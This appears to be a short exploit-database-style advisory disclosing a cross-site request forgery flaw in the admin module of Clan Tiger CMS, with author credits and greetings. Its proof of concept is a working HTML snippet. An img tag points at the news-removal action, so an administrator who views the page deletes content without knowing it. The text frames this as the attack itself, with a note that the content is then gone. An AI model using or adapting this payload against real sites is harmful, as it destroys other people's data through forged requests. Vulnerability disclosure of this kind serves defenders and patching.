=======================================================================
Clain_TIger_CMS CSRF Vulnerability
=======================================================================# Vulnerability found in- Admin module# email Pratulag@yahoo.com# company aksitservices# Credit by Pratul Agrawal# SoftwareClan Tiger_CMS# Category CMS / Portals# Site p4ge http://server/clantiger/index.php?module=login# Greetz to Gaurav, Prateek, Vivek, Sanjay, Sourabh, Varun (My Web Team)#Proof of concept #
Targeted URL:http://servername/clantiger/
Script to Delete the News content through Cross Site request forgery
.................................................................................................................<html><body><img src=http://server/clantiger/index.php?module=news&action=remove&id=[user ID]/></body></html>...................................................................................................................
After execution refresh the page and u can see that a added content is deleted automatically.
